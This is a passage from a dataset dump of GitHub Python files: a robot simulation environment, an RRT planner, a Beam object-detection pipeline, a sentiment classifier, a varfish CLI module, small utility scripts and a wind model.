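    add.add_argument("b", type=int)

    args = parser.parse_args(argv)
    if not args.command:          # no subcommand given: show usage, as the record does
        parser.print_help()
        return 1
    commands = {"greet": do_greet, "add": do_add}
    return commands[args.command](args)

if __name__ == "__main__":
    main(["add", "2", "3"])       # prints 5
```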
/ 300.\n bullet_client.setTimeStep(time_step)\n bullet_client.setRealTimeSimulation(0)\n\n self.bullet_client = bullet_client\n\n self.task = get_task(task_config, self.bullet_client)\n\n self.robot = get_robot(robot_config, self.bullet_client)\n\n self.action_space = spaces.flatten_space(self.robot.action_space)\n\n self.state_space = spaces.Dict({\n 'robot': self.robot.state_space,\n 'task': self.task.state_space,\n })\n\n self.goal_space = self.task.goal_space\n\n self.reward_function = self.task.reward_function\n self.success_criterion = self.task.success_criterion\n\n def __del__(self):\n del self.robot\n del self.task\n\n def reset(self, desired_state=None, desired_goal=None):\n \"\"\"\n Reset the environment and return new state\n \"\"\"\n\n if desired_state is None:\n desired_state = {}\n\n state_robot = self.robot.reset(desired_state.get(\"robot\"))\n state_task, goal, info = self.task.reset(desired_state.get(\"task\"), desired_goal, self.robot, state_robot)\n\n state = {\n 'robot': state_robot,\n 'task': state_task\n }\n\n return state, goal, info\n\n def step(self, action):\n action = spaces.unflatten(self.robot.action_space, action)\n\n state_robot = self.robot.step(action)\n state_task, goal, done, info = self.task.step(state_robot, self.robot)\n\n state = {\n 'robot': state_robot,\n 'task': state_task\n }\n\n return state, goal, done, info\n","repo_name":"tmdt-buw/karolos","sub_path":"karolos/environments/environment_robot_task.py","file_name":"environment_robot_task.py","file_ext":"py","file_size_in_byte":2789,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"72"} +{"seq_id":"34061863376","text":"import random\n\nimport numpy as np\n\nfrom src.rrt.tree import Tree\nfrom src.utilities.geometry import steer\n\n\nclass RRTBase(object):\n def __init__(self, X, Q, x_init, x_goal, max_samples, r, prc=0.01):\n \"\"\"\n Template RRT planner\n :param X: Search Space\n :param Q: list of lengths of edges added to tree\n :param x_init: tuple, initial location\n :param x_goal: tuple, goal location\n :param max_samples: max number of samples to take\n :param r: resolution of points to sample along edge when checking for collisions\n :param prc: probability of checking whether there is a solution\n \"\"\"\n self.X = X\n self.samples_taken = 0\n self.max_samples = max_samples\n self.Q = Q\n self.r = r\n self.prc = prc\n self.x_init = x_init\n self.x_goal = x_goal\n self.trees = [] # list of all trees\n self.add_tree() # add initial tree\n\n def add_tree(self):\n \"\"\"\n Create an empty tree and add to trees\n \"\"\"\n self.trees.append(Tree(self.X))\n\n def add_vertex(self, tree, v):\n \"\"\"\n Add vertex to corresponding tree\n :param tree: int, tree to which to add vertex\n :param v: tuple, vertex to add\n \"\"\"\n self.trees[tree].V.insert(0, v + v, v)\n self.trees[tree].V_count += 1 # increment number of vertices in tree\n self.samples_taken += 1 # increment number of samples taken\n\n def add_edge(self, tree, child, parent):\n \"\"\"\n Add edge to corresponding tree\n :param tree: int, tree to which to add vertex\n :param child: tuple, child vertex\n :param parent: tuple, parent vertex\n \"\"\"\n self.trees[tree].E[child] = parent\n\n def nearby(self, tree, x, n):\n \"\"\"\n Return nearby vertices\n :param tree: int, tree being searched\n :param x: tuple, vertex around which searching\n :param n: int, max number of neighbors to return\n :return: list of nearby vertices\n \"\"\"\n return self.trees[tree].V.nearest(x, num_results=n, 
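`EnvironmentRobotTask` above exposes `spaces.flatten_space(self.robot.action_space)` to the agent and calls `spaces.unflatten` on every step; a small round-trip sketch of those gym helpers, with a made-up Dict layout standing in for the robot's action space:

```python
import numpy as np
from gym import spaces

# Hypothetical action space; the real one comes from the robot config.
action_space = spaces.Dict({
    "arm": spaces.Box(low=-1.0, high=1.0, shape=(3,), dtype=np.float32),
    "gripper": spaces.Box(low=0.0, high=1.0, shape=(1,), dtype=np.float32),
})

flat_space = spaces.flatten_space(action_space)  # Box of shape (4,)
sample = action_space.sample()                   # dict of arrays
flat = spaces.flatten(action_space, sample)      # 1-D vector an agent can emit
restored = spaces.unflatten(action_space, flat)  # back to the dict layout

assert flat_space.shape == (4,)
assert np.allclose(restored["arm"], sample["arm"])
```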
objects=\"raw\")\n\n def get_nearest(self, tree, x):\n \"\"\"\n Return vertex nearest to x\n :param tree: int, tree being searched\n :param x: tuple, vertex around which searching\n :return: tuple, nearest vertex to x\n \"\"\"\n return next(self.nearby(tree, x, 1))\n\n def new_and_near(self, tree, q):\n \"\"\"\n Return a new steered vertex and the vertex in tree that is nearest\n :param tree: int, tree being searched\n :param q: length of edge when steering\n :return: vertex, new steered vertex, vertex, nearest vertex in tree to new vertex\n \"\"\"\n x_rand = self.X.sample_free()\n x_nearest = self.get_nearest(tree, x_rand)\n x_new = self.bound_point(steer(x_nearest, x_rand, q[0]))\n # check if new point is in X_free and not already in V\n if not self.trees[0].V.count(x_new) == 0 or not self.X.obstacle_free(x_new):\n return None, None\n self.samples_taken += 1\n return x_new, x_nearest\n\n def connect_to_point(self, tree, x_a, x_b):\n \"\"\"\n Connect vertex x_a in tree to vertex x_b\n :param tree: int, tree to which to add edge\n :param x_a: tuple, vertex\n :param x_b: tuple, vertex\n :return: bool, True if able to add edge, False if prohibited by an obstacle\n \"\"\"\n if self.trees[tree].V.count(x_b) == 0 and self.X.collision_free(x_a, x_b, self.r):\n self.add_vertex(tree, x_b)\n self.add_edge(tree, x_b, x_a)\n return True\n return False\n\n def can_connect_to_goal(self, tree):\n \"\"\"\n Check if the goal can be connected to the graph\n :param tree: rtree of all Vertices\n :return: True if can be added, False otherwise\n \"\"\"\n x_nearest = self.get_nearest(tree, self.x_goal)\n if self.x_goal in self.trees[tree].E and x_nearest in self.trees[tree].E[self.x_goal]:\n # tree is already connected to goal using nearest vertex\n return True\n if self.X.collision_free(x_nearest, self.x_goal, self.r): # check if obstacle-free\n return True\n return False\n\n def get_path(self):\n \"\"\"\n Return path through tree from start to goal\n :return: path if possible, None otherwise\n \"\"\"\n if self.can_connect_to_goal(0):\n print(\"Can connect to goal\")\n self.connect_to_goal(0)\n return self.reconstruct_path(0, self.x_init, self.x_goal)\n print(\"Could not connect to goal\")\n return None\n\n def connect_to_goal(self, tree):\n \"\"\"\n Connect x_goal to graph\n (does not check if this should be possible, for that use: can_connect_to_goal)\n :param tree: rtree of all Vertices\n \"\"\"\n x_nearest = self.get_nearest(tree, self.x_goal)\n self.trees[tree].E[self.x_goal] = x_nearest\n\n def reconstruct_path(self, tree, x_init, x_goal):\n \"\"\"\n Reconstruct path from start to goal\n :param tree: int, tree in which to find path\n :param x_init: tuple, starting vertex\n :param x_goal: tuple, ending vertex\n :return: sequence of vertices from start to goal\n \"\"\"\n path = [x_goal]\n current = x_goal\n if x_init == x_goal:\n return path\n while not self.trees[tree].E[current] == x_init:\n path.append(self.trees[tree].E[current])\n current = self.trees[tree].E[current]\n path.append(x_init)\n path.reverse()\n return path\n\n def check_solution(self):\n # probabilistically check if solution found\n if self.prc and random.random() < self.prc:\n print(\"Checking if can connect to goal at\", str(self.samples_taken), \"samples\")\n path = self.get_path()\n if path is not None:\n return True, path\n # check if can connect to goal after generating max_samples\n if self.samples_taken >= self.max_samples:\n return True, self.get_path()\n return False, None\n\n def bound_point(self, point):\n # if point is 
out-of-bounds, set to bound\n point = np.maximum(point, self.X.dimension_lengths[:, 0])\n point = np.minimum(point, self.X.dimension_lengths[:, 1])\n return tuple(point)\n","repo_name":"motion-planning/rrt-algorithms","sub_path":"src/rrt/rrt_base.py","file_name":"rrt_base.py","file_ext":"py","file_size_in_byte":6426,"program_lang":"python","lang":"en","doc_type":"code","stars":459,"dataset":"github-code","pt":"72"} +{"seq_id":"15786646201","text":"\n\n\"\"\"A pipeline that uses RunInference API to perform object detection.\"\"\"\n\nimport argparse\nimport io\nimport logging\nimport json\nfrom typing import Iterable\nfrom typing import Tuple\nfrom typing import Mapping\nfrom typing import Any\nfrom typing import Dict\n\nimport apache_beam as beam\nimport torch\nfrom apache_beam.io.filesystems import FileSystems\nfrom apache_beam.ml.inference.base import KeyedModelHandler\nfrom apache_beam.ml.inference.base import PredictionResult\nfrom apache_beam.ml.inference.base import RunInference\nfrom apache_beam.ml.inference.pytorch_inference import PytorchModelHandlerTensor\nfrom apache_beam.options.pipeline_options import PipelineOptions\nfrom apache_beam.options.pipeline_options import SetupOptions\nfrom apache_beam.options.pipeline_options import GoogleCloudOptions\nfrom apache_beam.runners.runner import PipelineResult\nfrom PIL import Image\nfrom torchvision import models\nfrom torchvision import transforms\n\n\ndef read_image(project_id: str, element: Dict[str, str]) -> Tuple[str, Image.Image]:\n image_file_name = f\"gs://{project_id}-dataflow-ml-ad/{element['filename']}\"\n with FileSystems().open(image_file_name, 'r') as file:\n image_data = Image.open(io.BytesIO(file.read())).convert('RGB')\n return element['filename'], image_data\n\n\ndef preprocess_image(image_data: Image.Image) -> torch.Tensor:\n # remove .cuda() if you run this pipeline without GPU\n transform = transforms.ToTensor()\n return transform(image_data).cuda()\n\n\nclass PostProcessor(beam.DoFn):\n LABELS = [\"\", \"person\", \"bicycle\", \"car\", \"motorcycle\", \"airplane\", \"bus\", \"train\", \"truck\", \"boat\", \"traffic light\", \"fire hydrant\", \"street sign\", \"stop sign\", \"parking meter\", \"bench\", \"bird\", \"cat\", \"dog\", \"horse\", \"sheep\", \"cow\", \"elephant\", \"bear\", \"zebra\", \"giraffe\", \"hat\", \"backpack\", \"umbrella\", \"shoe\", \"eye glasses\", \"handbag\", \"tie\", \"suitcase\", \"frisbee\", \"skis\", \"snowboard\", \"sports ball\", \"kite\", \"baseball bat\", \"baseball glove\", \"skateboard\", \"surfboard\", \"tennis racket\", \"bottle\", \"plate\", \"wine glass\", \"cup\", \"fork\", \"knife\", \"spoon\", \"bowl\", \"banana\", \"apple\", \"sandwich\", \"orange\", \"broccoli\", \"carrot\", \"hot dog\", \"pizza\", \"donut\", \"cake\", \"chair\", \"couch\", \"potted plant\", \"bed\", \"mirror\", \"dining table\", \"window\", \"desk\", \"toilet\", \"door\", \"tv\", \"laptop\", \"mouse\", \"remote\", \"keyboard\", \"cell phone\", \"microwave\", \"oven\", \"toaster\", \"sink\", \"refrigerator\", \"blender\", \"book\", \"clock\", \"vase\", \"scissors\", \"teddy bear\", \"hair drier\", \"toothbrush\", \"hair brush\"]\n\n def process(self, element: Tuple[str, PredictionResult]) -> Iterable[Dict]:\n filename, prediction_result = element\n prediction = prediction_result.inference\n for bbox, label, score in zip(prediction['boxes'].cpu().detach().numpy(),\n prediction['labels'].cpu().detach().numpy(),\n prediction['scores'].cpu().detach().numpy()):\n yield ({'filename': filename,\n 'bbox': 
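`bound_point` above clamps an out-of-bounds sample with a `np.maximum`/`np.minimum` pair; `np.clip` states the same operation in one call, sketched here with invented bounds:

```python
import numpy as np

# Same [lower, upper] per-dimension layout as X.dimension_lengths.
dimension_lengths = np.array([[0.0, 100.0],   # x bounds
                              [0.0, 50.0]])   # y bounds

def bound_point(point):
    # One clip is equivalent to maximum() against lows then minimum() against highs.
    return tuple(np.clip(point, dimension_lengths[:, 0], dimension_lengths[:, 1]))

print(bound_point((120.0, -3.0)))  # (100.0, 0.0)
```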
json.dumps([float(x) for x in bbox]),\n 'label_id': int(label),\n 'label': self.LABELS[int(label)],\n 'score': float(score)})\n\n\ndef parse_known_args(argv):\n \"\"\"Parses args for the workflow.\"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--model_state_dict_path',\n dest='model_state_dict_path',\n required=True,\n help=\"Path to the model's state_dict.\")\n return parser.parse_known_args(argv)\n\n\ndef run(\n argv=None,\n save_main_session=True) -> PipelineResult:\n \"\"\"\n Args:\n argv: Command line arguments defined for this example.\n save_main_session: Used for internal testing.\n \"\"\"\n known_args, pipeline_args = parse_known_args(argv)\n pipeline_options = PipelineOptions(pipeline_args)\n pipeline_options.view_as(SetupOptions).save_main_session = save_main_session\n gc_options = pipeline_options.view_as(GoogleCloudOptions)\n\n model_class = models.detection.fasterrcnn_resnet50_fpn\n model_params = {'num_classes': 91}\n\n # In this example we pass keyed inputs to RunInference transform.\n # Therefore, we use KeyedModelHandler wrapper over PytorchModelHandler.\n model_handler = PytorchModelHandlerTensor(\n state_dict_path=known_args.model_state_dict_path,\n model_class=model_class,\n model_params=model_params,\n device='GPU')\n\n # override batch_elements_kwargs to change min/max batch size\n def batch_elements_kwargs_() -> Mapping[str, Any]:\n return {'min_batch_size':10, 'max_batch_size':10}\n model_handler.batch_elements_kwargs = batch_elements_kwargs_\n\n\n query = f\"\"\"\n SELECT\n filename\n FROM\n `{gc_options.project}.dfdemo.interpolated`\n WHERE\n frame_id = 'center_camera'\n ORDER BY\n timestamp\n \"\"\"\n table_schema = \"filename:STRING, bbox:STRING, label_id:NUMERIC, label:STRING, score:FLOAT64\"\n\n pipeline = beam.Pipeline(options=pipeline_options)\n filename_value_pair = (\n pipeline\n | 'ReadImageNames' >> beam.io.ReadFromBigQuery(\n project=gc_options.project, use_standard_sql=True, query=query)\n | 'ReadImageData' >> beam.Map(\n lambda element: read_image(gc_options.project, element))\n | 'PreprocessImages' >> beam.MapTuple(\n lambda image_file_name, image_data: (image_file_name, preprocess_image(image_data))))\n predictions = (\n filename_value_pair\n | 'PyTorchRunInference' >> RunInference(KeyedModelHandler(model_handler))\n | 'ProcessOutput' >> beam.ParDo(PostProcessor()))\n predictions | \"WriteToBigQuery\" >> beam.io.WriteToBigQuery(\n f\"{gc_options.project}:dfdemo.inference\",\n project=gc_options.project,\n schema=table_schema,\n write_disposition=beam.io.BigQueryDisposition.WRITE_TRUNCATE,\n create_disposition=beam.io.BigQueryDisposition.CREATE_IF_NEEDED)\n\n result = pipeline.run()\n return result\n\n\nif __name__ == '__main__':\n logging.getLogger().setLevel(logging.INFO)\n run()","repo_name":"hayatoy/dataflow-ml-ad","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5864,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"25168387040","text":"\"\"\"\n Train a logistic regresion model for document classification.\n\n Search this file for the keyword \"Hint\" for possible areas of\n improvement. 
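`PostProcessor` above flattens torchvision's per-image detection dict into one BigQuery row per box; the same zip-and-convert step with plain NumPy stand-ins (the values are dummies, no Beam or Torch required):

```python
import json
import numpy as np

# Shapes mimic torchvision's detection output after .cpu().detach().numpy().
prediction = {
    "boxes": np.array([[10.0, 20.0, 110.0, 220.0]]),
    "labels": np.array([1]),
    "scores": np.array([0.97]),
}
LABELS = ["", "person"]  # truncated label map, enough for the sketch

rows = [
    {
        "filename": "frame_0001.jpg",                    # hypothetical key
        "bbox": json.dumps([float(x) for x in bbox]),    # JSON string, as the record stores it
        "label_id": int(label),
        "label": LABELS[int(label)],
        "score": float(score),
    }
    for bbox, label, score in zip(prediction["boxes"],
                                  prediction["labels"],
                                  prediction["scores"])
]
print(rows[0]["label"], rows[0]["bbox"])  # person [10.0, 20.0, 110.0, 220.0]
```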
There are of course others.\n\"\"\"\n\nimport pandas as pd\nimport pickle\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\n# Hint: These are not actually used in the current \n# pipeline, but would be used in an alternative \n# tokenizer such as PorterStemming.\nimport nltk\nnltk.download('stopwords')\nfrom nltk.corpus import stopwords\nstop = stopwords.words('english')\n\n\"\"\"\n    This is a very basic tokenization strategy. \n    \n    Hint: Perhaps implement others such as PorterStemming\n    Hint: Is this even used? Where would you place it?\n\"\"\"\ndef tokenizer(text):\n    return text.split()\n\n# Read in the dataset and store in a pandas dataframe\ndf = pd.read_csv('./training_movie_data.csv')\n\n# Split your data into training and test sets.\n# Allows you to train the model, and then perform\n# validation to get a sense of performance.\n# \n# Hint: This might be an area to change the size\n# of your training and test sets for improved \n# predictive performance.\ntraining_size = 40000\n# pandas .loc slicing is inclusive on both ends, so the training slice stops\n# at training_size - 1 to keep the training and test sets disjoint.\nX_train = df.loc[:training_size - 1, 'review'].values\ny_train = df.loc[:training_size - 1, 'sentiment'].values\nX_test = df.loc[training_size:, 'review'].values\ny_test = df.loc[training_size:, 'sentiment'].values\n\n# Perform feature extraction on the text.\n# Hint: Perhaps there are different preprocessors to\n# test? \ntfidf = TfidfVectorizer(strip_accents=None,\n                        lowercase=False,\n                        preprocessor=None)\n\n# Hint: There are methods to perform parameter sweeps to find the\n# best combination of parameters. Look towards GridSearchCV in \n# sklearn or other model selection strategies.\n\n# Create a pipeline to vectorize the data and then perform regression.\n# Hint: Are there other options to add to this process?\n# Look to documentation on Regression or similar methods for hints.\n# Possibly investigate alternative classifiers for text/sentiment.\n# The liblinear solver is specified because the l1 penalty requires it on\n# current scikit-learn releases.\nlr_tfidf = Pipeline([('vect', tfidf),\n                     ('clf', LogisticRegression(C=0.001,fit_intercept=False,penalty='l1',solver='liblinear',random_state=0))])\n\n# Train the pipeline using the training set.\nlr_tfidf.fit(X_train, y_train)\n\n# Print the Test Accuracy\nprint('Test Accuracy: %.3f' % lr_tfidf.score(X_test, y_test))\n\n# Save the classifier for use later.\npickle.dump(lr_tfidf, open(\"saved_model.sav\", 'wb'))\n","repo_name":"mattie-mcp/ai","sub_path":"sentiment-analysis/basic_sentiment_pipeline.py","file_name":"basic_sentiment_pipeline.py","file_ext":"py","file_size_in_byte":2512,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"10416163323","text":"\"\"\"Implementation of varfish-cli subcommand \"cases *\".\"\"\"\n\nimport typing\nimport uuid\n\nimport typer\n\nfrom varfish_cli import api, common\nfrom varfish_cli.cli.common import ListObjects, RetrieveObject\nfrom varfish_cli.common import OutputFormat\n\n#: Default fields for projects.\nDEFAULT_FIELDS_CASE: typing.Dict[OutputFormat, typing.Optional[typing.Tuple[str, ...]]] = {\n    OutputFormat.TABLE.value: (\"sodar_uuid\", \"name\", \"index\", \"members\"),\n    OutputFormat.CSV.value: None,\n    OutputFormat.JSON.value: None,\n}\n\n#: The ``Typer`` instance to use for the ``cases`` sub command.\napp = typer.Typer(no_args_is_help=True)\n\n\n@app.command(\"case-list\")\ndef cli_case_list(\n    ctx: typer.Context,\n    project_uuid: typing.Annotated[\n        uuid.UUID, typer.Argument(..., help=\"UUID of project to list cases for\")\n    ],\n    output_file: typing.Annotated[\n        str, 
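The sentiment-pipeline record above hints at `GridSearchCV` for the parameter sweep; a toy sketch of sweeping `C` over the same TF-IDF + logistic-regression pipeline (the four-document corpus is fabricated just so the snippet runs):

```python
from sklearn.pipeline import Pipeline
from sklearn.linear_model import LogisticRegression
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.model_selection import GridSearchCV

# Tiny invented corpus; the real data comes from training_movie_data.csv.
X = ["loved it", "hated it", "great movie", "terrible film"] * 5
y = [1, 0, 1, 0] * 5

pipe = Pipeline([("vect", TfidfVectorizer()),
                 ("clf", LogisticRegression(max_iter=1000))])

# Parameters of pipeline steps are addressed as <step>__<param>.
grid = GridSearchCV(pipe,
                    param_grid={"clf__C": [0.01, 0.1, 1.0, 10.0]},
                    cv=2)
grid.fit(X, y)
print(grid.best_params_, grid.best_score_)
```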
typer.Option(\"--output-file\", help=\"Path to file to write to\")\n ] = \"-\",\n output_format: typing.Annotated[\n OutputFormat, typer.Option(\"--output-format\", help=\"Output format\")\n ] = OutputFormat.TABLE.value,\n output_delimiter: typing.Annotated[\n str, typer.Option(\"--output-delimiter\", help=\"Delimiter for CSV output\")\n ] = \",\",\n output_fields: typing.Annotated[\n typing.Optional[typing.List[str]], typer.Option(\"--output-fields\", help=\"Output fields\")\n ] = None,\n):\n \"\"\"List all Case entries for the\"\"\"\n common_options: common.CommonOptions = ctx.obj\n\n list_objects = ListObjects(api.Case)\n return list_objects.run(\n common_options=common_options,\n callable=api.case_list,\n output_file=output_file,\n output_format=output_format,\n output_delimiter=output_delimiter,\n output_fields=output_fields,\n parent_uuid=project_uuid,\n default_fields=DEFAULT_FIELDS_CASE,\n )\n\n\n@app.command(\"case-retrieve\")\ndef cli_case_retrieve(\n ctx: typer.Context,\n object_uuid: typing.Annotated[\n uuid.UUID, typer.Argument(..., help=\"UUID of the object to retrieve\")\n ],\n output_file: typing.Annotated[\n str, typer.Option(\"--output-file\", help=\"Path to file to write to\")\n ] = \"-\",\n):\n \"\"\"Retrieve Case by UUID\"\"\"\n common_options: common.CommonOptions = ctx.obj\n\n retrieve_object = RetrieveObject(api.Case)\n return retrieve_object.run(\n common_options=common_options,\n callable=api.case_retrieve,\n key_name=\"case_uuid\",\n object_uuid=object_uuid,\n output_file=output_file,\n )\n","repo_name":"bihealth/varfish-cli","sub_path":"varfish_cli/cli/cases.py","file_name":"cases.py","file_ext":"py","file_size_in_byte":2502,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"26255886695","text":"#!/usr/bin/env python3\r\n#-*- coding: utf-8 -*-\r\n\r\nfrom time import clock\r\nimport urllib.request as urllib\r\nimport sys, os\r\n\r\n\r\n\r\ndic = {\t'á':'a', 'à':'a', 'ã':'a',\r\n\t\t'é':'e', 'è':'e', 'ê':'e',\r\n\t\t'í':'i',\r\n\t\t'ó':'o', 'õ':'o', 'ô':'o',\r\n\t\t'ú':'u'}\r\n\r\n\r\ndef reporthook(blocknum, blocksize, totalsize):\r\n readsofar = blocknum * blocksize\r\n if totalsize > 0:\r\n percent = readsofar * 1e2 / totalsize\r\n n = '#' * int(30 * percent / 100)\r\n s = \"\\r %*.2f KB |%-30s| %5.1f%% / %5.2f KB\" % (len(str(totalsize)), readsofar / 1024, n, percent, totalsize / 1024)\r\n sys.stderr.write(s)\r\n if readsofar >= totalsize: # near the end\r\n sys.stderr.write(\"\\n\")\r\n else: # total size is unknown\r\n sys.stderr.write(\"read %d\\n\" % (readsofar,))\r\n\r\n\r\ndef readWords(url):\t\r\n\tif not os.path.exists('data.db'):\r\n\t\tprint(\"~Carregando banco de palavras~\")\r\n\t\tpage = urllib.urlretrieve(url, 'data.db', reporthook)\r\n\twith open('data.db', 'r', encoding = 'iso8859') as db:\r\n\t\twords = db.read()\r\n\r\n\tif len(words) == 0:\r\n\t\tos.remove('data.db')\r\n\t\treturn readWords(url)\r\n\r\n\treturn words.split()\r\n\r\ndef cleanWords(words):\r\n\tglobal dic\r\n\ti = 0\r\n\twhile i < len(words):\r\n\t\tlow = words[i].lower()\r\n\t\twords[i] = low\r\n\t\tnew = ''\r\n\t\tfor c in words[i]:\r\n\t\t\tif c in dic:\r\n\t\t\t\tnew += dic[c]\r\n\t\t\telse:\r\n\t\t\t\tnew += c\r\n\t\twords[i] = new\r\n\t\ti += 1\r\n\treturn 
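The varfish-cli record above declares its commands with `typer` and `typing.Annotated` arguments and options; a self-contained sketch of that declaration style (the `greet` command is invented):

```python
import typing
import typer

app = typer.Typer(no_args_is_help=True)

@app.command("greet")
def greet(
    name: typing.Annotated[str, typer.Argument(..., help="who to greet")],
    output_file: typing.Annotated[
        str, typer.Option("--output-file", help="path to write to")
    ] = "-",
):
    """Greet someone, writing to stdout when OUTPUT_FILE is '-'."""
    line = f"hello, {name}\n"
    if output_file == "-":
        typer.echo(line, nl=False)
    else:
        with open(output_file, "w") as fh:
            fh.write(line)

if __name__ == "__main__":
    app()
```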
words","repo_name":"ryukinix/pyzumbi-amazon","sub_path":"exercícios/EPs/forca/aux_functions.py","file_name":"aux_functions.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"7371486915","text":"import http.client\nimport xml.etree.ElementTree as ET\n\n\ndef get_session_code():\n\n conn = http.client.HTTPConnection(\"172.24.183.26:9763\")\n\n payload = \"\\r\\n \" \\\n \"Tape Test Application\\r\\n \" \\\n \"1\\r\\n \" \\\n \"1\\r\\n\" \\\n \"\"\n\n headers = {\n 'content-type': \"application/xml\",\n 'accept': \"application/xml\"\n }\n\n conn.request(\"POST\", \"/services/DIVArchiveWS_REST_2.1/registerClient\", payload, headers)\n\n res = conn.getresponse()\n data = res.read()\n\n# clientcode = xmltodict.parse(data.decode('UTF8'))\n\n root = ET.fromstring(data.decode('UTF8'))\n sessioncode = root[0].text\n\n print(sessioncode)\n return sessioncode\n\nif __name__ == '__main__':\n get_session_code()\n\n\n\n","repo_name":"polython/DIVA_Web_Interface","sub_path":"sescode.py","file_name":"sescode.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"73965670314","text":"from export_zinc_ids import get_info_zincid\nimport sys, subprocess, os\n\ninfn = sys.argv[1]\n\nlegacy_targets = [\n\"/nfs/exb/zinc22/export/deprecated/ZINC_21Q2\",\n\"/nfs/exb/zinc22/export/deprecated/2d-09\",\n\"/nfs/exb/zinc22/export/deprecated/2d-10\",\n\"/nfs/exb/zinc22/export/deprecated/2d-01\",\n\"/nfs/exb/zinc22/export/deprecated/2d-11\",\n\"/nfs/exb/zinc22/export/deprecated/2d-12-diff/2d/finished\"]\ncurr_buffer = []\ncurr_hac = None\ncurr_tranche = None\n\noutbuffer = open('result', 'w')\n\ndef check_targets(curr_buffer, outbuffer, tranche, hac):\n\tfor target in legacy_targets:\n\t\tprint(target, curr_tranche, curr_buffer)\n\t\tif len(curr_buffer) == 0:\n\t\t\tbreak\n\t\ttfile = os.path.join(target, curr_hac, curr_tranche)\n\t\tif os.path.exists(tfile + '.smi'):\n\t\t\ttfile = tfile + '.smi'\n\t\t\tg = \"grep\"\n\t\telif os.path.exists(tfile + '.smi.gz'):\n\t\t\ttfile = tfile + '.smi.gz'\n\t\t\tg = \"zgrep\"\n\t\telse:\n\t\t\tcontinue\n\t\twith subprocess.Popen([g, \"-E\", '|'.join(curr_buffer), tfile], stdout=subprocess.PIPE) as spt:\n\t\t\tfor line in spt.stdout:\n\t\t\t\tf1, f2 = line.decode('utf-8').strip().split()\n\t\t\t\tif f1.startswith(\"ZINC\"):\n\t\t\t\t\tzincid = f1\n\t\t\t\t\tsmiles = f2\n\t\t\t\telse:\n\t\t\t\t\tzincid = f2\n\t\t\t\t\tsmiles = f1\n\t\t\t\tprint(zincid, smiles)\n\t\t\t\toutbuffer.write('\\t'.join([zincid, smiles]) + '\\n')\n\t\t\t\t#outbuffer.append('\\t'.join([zincid, smiles]))\n\t\t\t\ttry: # if there's a duplicate there may be an error in this .remove statement\n\t\t\t\t\tcurr_buffer.remove(zincid)\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\nwith open(infn, 'r') as inf:\n\tlines = sorted([l.strip() for l in inf.readlines()])\n\tprint(lines[0:10])\n\tfor line in lines:\n\t\tprint(line)\n\t\ttranche, sub_id = get_info_zincid(line)\n\t\thac = tranche[:3]\n\t\tif tranche != curr_tranche:\n\t\t\tcheck_targets(curr_buffer, outbuffer, curr_tranche, curr_hac)\n\t\t\tif len(curr_buffer) != 0:\n\t\t\t\tprint(\"unable to find: {}\".format(curr_buffer))\n\t\t\tcurr_tranche = tranche\n\t\t\tcurr_hac = hac\n\t\t\tcurr_buffer = [line]\n\t\telse:\n\t\t\tcurr_buffer.append(line)\ncheck_targets(curr_buffer, outbuffer, curr_tranche, curr_hac)\n\noutbuffer.close()\n#with open(\"result\", 'w') as resf:\n#\tfor 
res in outbuffer:\n#\t\tresf.write(res + '\\n')\n","repo_name":"docking-org/zinc22-2d","sub_path":"utils-2d/tin/misc/comb_legacy_files.py","file_name":"comb_legacy_files.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70086055272","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 14 11:25:50 2020\n\n@author: repa\n\"\"\"\nfrom numpy import zeros, array, sqrt, exp, float32\nfrom numpy.random import normal\nimport base64\n\nclass WindModel:\n    def __init__(self, vx: float, vy: float, var: float, tau: float=100.0) -> None:\n        '''\n        Create a wind model, with varying wind\n\n        Parameters\n        ----------\n        vx : float\n            Average wind, x / northing direction.\n        vy : float\n            Average wind, y / easting direction.\n        var : float\n            Standard deviation of variation process.\n        tau : float\n            Normalized time constant of variation process.\n\n        Returns\n        -------\n        None\n        \n        '''\n        self.vbase = array((vx, vy), dtype=float32)\n        self.vvar = self.vbase.copy()\n        self.var = var / sqrt(0.5/tau)\n        self.psi = 1.0 - exp(-1.0/tau)\n        self.message = 'E'.encode('ascii') + base64.b64encode(self.vvar)\n    \n    def update(self):\n        '''\n        Update step of the wind, returns array with current wind\n\n        Returns\n        -------\n        array of float (copied!).\n\n        '''\n        self.vvar += -self.psi * self.vvar + \\\n            self.psi * normal(loc=self.vbase, scale=self.var)\n        self.message = 'E'.encode('ascii') + base64.b64encode(self.vvar)\n        return self.vvar\n    \nif __name__ == '__main__':\n    \n    from numpy import std\n    import matplotlib.pyplot as plt\n    \n    vxy1 = []\n    vxy2 = []\n    \n    wind = WindModel(5, 1, 0.5, 100)\n    for i in range(1000):\n        vxy1.append(wind.update().copy())\n    vxy1 = array(vxy1)\n    \n    wind = WindModel(5, 1, 0.5, 10)\n    for i in range(1000):\n        vxy2.append(wind.update().copy())\n    vxy2 = array(vxy2)\n    \n    f = plt.figure()\n    plt.subplot(211)\n    plt.plot(vxy1[:,0])\n    plt.plot(vxy1[:,1])\n\n    plt.subplot(212)\n    plt.plot(vxy2[:,0])\n    plt.plot(vxy2[:,1])\n\n    print(f'var 1 x {std(vxy1[:,0])} y {std(vxy1[:,1])}')\n    print(f'var 2 x {std(vxy2[:,0])} y {std(vxy2[:,1])}')\n    